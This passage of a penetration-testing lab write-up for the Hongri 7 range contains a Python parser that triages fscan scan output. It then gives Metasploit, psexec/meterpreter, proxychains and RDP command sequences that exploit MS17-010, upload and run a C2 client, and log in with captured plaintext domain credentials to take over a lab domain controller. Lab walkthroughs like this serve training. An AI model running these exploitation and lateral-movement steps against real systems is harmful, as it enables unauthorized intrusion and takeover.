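Two fscan versions appear in this write-up (1.8.2 earlier, 2.0.1 here) and they print different line formats, so a parser that normalizes both into one per-host picture is useful for whoever has to act on the results, in particular a defender turning the same output into a patch and isolation list. The following is an added example, not fscan's code or the original post's: the line patterns are those visible in the scan logs above, the sample input is assembled from those lines, and the severity labels are this example's own triage choice.

```python
"""Turn fscan output (1.8.x and 2.0.x line formats) into a per-host finding list.

Added example for this write-up, not part of fscan or of the original post. The
patterns cover the line shapes seen in the scan logs above; SAMPLE_V1/SAMPLE_V2 are
assembled from those logs.
"""
import re
from collections import defaultdict

IP = r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
# fscan 2.0.x prefixes each line with "[timestamp] [LEVEL] "; 1.8.x prints bare lines.
PREFIX_RE = re.compile(r"^\[[^\]]+\]\s+\[[A-Z]+\]\s+")

PATTERNS = [
    ("alive", re.compile(rf"^\(icmp\) Target {IP} is alive$")),
    ("alive", re.compile(rf"^目标 {IP} 存活")),
    ("port",  re.compile(rf"^{IP}:(?P<port>\d+) open$")),
    ("port",  re.compile(rf"^端口开放 {IP}:(?P<port>\d+)$")),
    ("vuln",  re.compile(rf"^\[\+\] {IP} (?P<id>MS\d{{2}}-\d{{3}}) \((?P<os>.*)\)$")),
    ("vuln",  re.compile(rf"^发现漏洞 {IP} \[(?P<os>.*)\] (?P<id>MS\d{{2}}-\d{{3}})$")),
    ("poc",   re.compile(rf"^\[\+\] https?://{IP}(?::\d+)? (?P<poc>poc-yaml-\S+|tongda-\S+)$")),
    ("svc",   re.compile(rf"^\[\+\] (?P<svc>Redis|SSH):{IP}:(?P<port>\d+)[: ](?P<detail>.*)$")),
    ("name",  re.compile(rf"^(?:\[\*\] NetBios: |NetBios ){IP} (?P<name>\S+)")),
]
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2}


def parse_fscan(text: str) -> dict:
    """Return {ip: {'alive', 'ports', 'names', 'findings': [(severity, text), ...]}}."""
    hosts = defaultdict(lambda: {"alive": False, "ports": set(), "names": set(), "findings": []})
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw.strip())
        for kind, rx in PATTERNS:
            m = rx.match(line)
            if not m:
                continue
            g = m.groupdict()
            h = hosts[g["ip"]]
            if kind == "alive":
                h["alive"] = True
            elif kind == "port":
                h["ports"].add(int(g["port"]))
            elif kind == "name":
                h["names"].add(g["name"])
            elif kind == "vuln":      # unauthenticated SMB code execution: patch or isolate first
                h["findings"].append(("critical", f"{g['id']} ({g['os']})"))
            elif kind == "poc":       # web PoC matched: verify and patch the application
                h["findings"].append(("high", g["poc"]))
            elif kind == "svc":
                if g["svc"] == "SSH":  # fscan printed a working password; report only the user
                    h["findings"].append(("critical", f"SSH:{g['port']} weak credential for {g['detail'].split()[0]}"))
                else:
                    sev = "critical" if "unauthorized" in g["detail"] else "medium"
                    h["findings"].append((sev, f"Redis:{g['port']} {g['detail']}"))
            break
    return dict(hosts)


def prioritize(hosts: dict) -> list:
    """Order hosts by worst severity, then by number of findings, then by address."""
    def key(item):
        ip, h = item
        worst = min((SEVERITY_RANK[s] for s, _ in h["findings"]), default=len(SEVERITY_RANK))
        return (worst, -len(h["findings"]), ip)
    return [{"ip": ip, "names": sorted(h["names"]), "ports": sorted(h["ports"]),
             "findings": h["findings"]} for ip, h in sorted(hosts.items(), key=key)]


# Constructed from the fscan 1.8.2 lines shown earlier on this page.
SAMPLE_V1 = """\
(icmp) Target 192.168.52.10 is alive
(icmp) Target 192.168.52.20 is alive
(icmp) Target 192.168.52.30 is alive
192.168.52.30:445 open
192.168.52.10:6379 open
192.168.52.10:22 open
192.168.52.20:8000 open
[+] Redis:192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
[*] NetBios: 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[+] 192.168.52.30 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] SSH:192.168.52.10:22:root 123456
[+] http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
[+] http://192.168.52.30:8080 tongda-user-session-disclosure
"""

# Constructed from the fscan 2.0.1 lines shown above.
SAMPLE_V2 = """\
[2026-06-14 23:40:32] [SUCCESS] 目标 192.168.93.30 存活 (ICMP)
[2026-06-14 23:40:52] [SUCCESS] 端口开放 192.168.93.30:389
[2026-06-14 23:40:46] [SUCCESS] 端口开放 192.168.93.30:88
[2026-06-14 23:43:10] [SUCCESS] NetBios 192.168.93.30 DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[2026-06-14 23:43:11] [SUCCESS] 发现漏洞 192.168.93.30 [Windows Server 2012 R2 Datacenter 9600] MS17-010
[2026-06-14 23:43:13] [SUCCESS] 发现漏洞 192.168.93.40 [Windows 7 Professional 7601 Service Pack 1] MS17-010
"""

if __name__ == "__main__":
    for entry in prioritize(parse_fscan(SAMPLE_V1 + SAMPLE_V2)):
        print(entry["ip"], entry["names"], entry["ports"])
        for sev, text in entry["findings"]:
            print(f"   [{sev}] {text}")
```

Lines the patterns do not recognize (banners, progress counters, WebTitle and InfoScan entries) are ignored rather than failing the parse, so the same function can be pointed at a full capture.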

Machine 4

Exploitation

We use msfconsole to exploit MS17-010:

msf exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(admin/smb/ms17_010_command) > set COMMAND whoami
COMMAND => whoami
msf auxiliary(admin/smb/ms17_010_command) > run
[-] Msf::OptionValidateError One or more options failed to validate: RHOSTS.
msf auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.93.30
RHOSTS => 192.168.93.30
msf auxiliary(admin/smb/ms17_010_command) > run
[*] 192.168.93.30:445 - Target OS: Windows Server 2012 R2 Datacenter 9600
[*] 192.168.93.30:445 - Built a write-what-where primitive...
[+] 192.168.93.30:445 - Overwrite complete... SYSTEM session obtained!
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.93.30:445 - Getting the command output...
[*] 192.168.93.30:445 - Executing cleanup...
[+] 192.168.93.30:445 - Cleanup was successful
[+] 192.168.93.30:445 - Command completed successfully!
[*] 192.168.93.30:445 - Output for "whoami":

nt authority\system



msf exploit(windows/smb/psexec) >  set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > set RHOST 192.168.93.3
RHOST => 192.168.93.3
msf exploit(windows/smb/psexec) > unset LHOST
Unsetting LHOST...
[!] Variable "LHOST" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear LHOST
msf exploit(windows/smb/psexec) > unset LHOST
Unsetting LHOST...
[!] Variable "LHOST" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear LHOST
msf exploit(windows/smb/psexec) > unset LPORT
Unsetting LPORT...
[!] Variable "LPORT" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear LPORT
msf exploit(windows/smb/psexec) > exploit
[*] 192.168.93.3:445 - Connecting to the server...
[*] 192.168.93.3:445 - Authenticating to 192.168.93.3:445 as user 'Administrator'...
[-] 192.168.93.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Unable to negotiate SMB1 with the remote host: Socket read returned nil
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/psexec) > set Proxies socks5:192.168.113.154:1003
Proxies => socks5:192.168.113.154:1003
msf exploit(windows/smb/psexec) > exploit
[*] 192.168.93.3:445 - Connecting to the server...
[*] 192.168.93.3:445 - Authenticating to 192.168.93.3:445 as user 'Administrator'...
[-] 192.168.93.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Unable to negotiate SMB1 with the remote host: Socket read returned nil
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/psexec) > set RHOST 192.168.93.30
RHOST => 192.168.93.30
msf exploit(windows/smb/psexec) > exploit
[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'Administrator'...
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[*] 192.168.93.30:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.93.30:445 - PowerShell found
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Powershell command length: 4457
[*] 192.168.93.30:445 - Executing the payload...
[*] 192.168.93.30:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.113.154[\svcctl] ...
[*] 192.168.93.30:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.113.154[\svcctl] ...
[*] 192.168.93.30:445 - Obtaining a service manager handle...
[*] 192.168.93.30:445 - Creating the service...
[+] 192.168.93.30:445 - Successfully created the service
[*] 192.168.93.30:445 - Starting the service...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.93.30:445 - Removing the service...
[+] 192.168.93.30:445 - Successfully removed the service
[*] 192.168.93.30:445 - Closing service handle...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (232006 bytes) to 192.168.93.30
[*] Meterpreter session 1 opened (192.168.113.154:45679 -> 192.168.113.154:1003) at 2026-06-15 08:17:33 -0400

meterpreter > dir
Listing: C:\Windows\system32
============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2013-08-22 10:53:38 -0400 0409
040777/rwxrwxrwx 0 dir 2013-08-22 19:48:47 -0400 0804

We then generate a new Windows bind-connection client with vshell and bring the host onto vshell:

meterpreter > upload /home/kali/Desktop/4444.exe C:\\4444.exe
[*] Uploading : /home/kali/Desktop/4444.exe -> C:\4444.exe
[*] Uploaded 3.94 MiB of 3.94 MiB (100.0%): /home/kali/Desktop/4444.exe -> C:\4444.exe
[*] Completed : /home/kali/Desktop/4444.exe -> C:\4444.exe
meterpreter > shell
Process 2884 created.
Channel 2 created.
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。

C:\Windows\system32>cd /
cd /

C:\>4444.exe
4444.exe

After running it, we create the bind connection in vshell.

The domain controller is now online in vshell.

The flag is on the domain controller:

C:\>type C:\flag.txt
hr7test12340okm9ijn
C:\>

Machine 5

Since we found earlier that 192.168.93.40 has port 3389 open, we can connect directly with the plaintext credentials captured before, or use MS17-010 over SMB as we did for the domain controller.

proxychains4 -f /tmp/proxychains_rdp.conf xfreerdp /v:192.168.93.40:3389 /u:administrator /p:Whoami2021 /d:WHOAMIANONY /cert-ignore /clipboard

Here we use a remote desktop connection:

proxychains4 -f /tmp/proxychains_rdp.conf rdesktop -d WHOAMIANONY -u administrator -p Whoami2021 192.168.93.40:3389 -r disk:share=/home/kali/Desktop   # share a local folder so the vshell bind client can be copied onto the machine

After uploading it to the machine,

launch 5555.exe; the bind connection comes up and the host is online.

Summary

The attack path for this range is shown below:

The Hongri 7 range covers very classic topics: unauthenticated Redis access, Docker escape, a Tongda OA vulnerability, and MS17-010 (EternalBlue) over SMB.

This run used the Wujing (无境) online range, so every C2 check-in was done with a bind connection. It was also my first time using vshell; overall, vshell is well suited to beginners, with a good graphical interface and a simple workflow.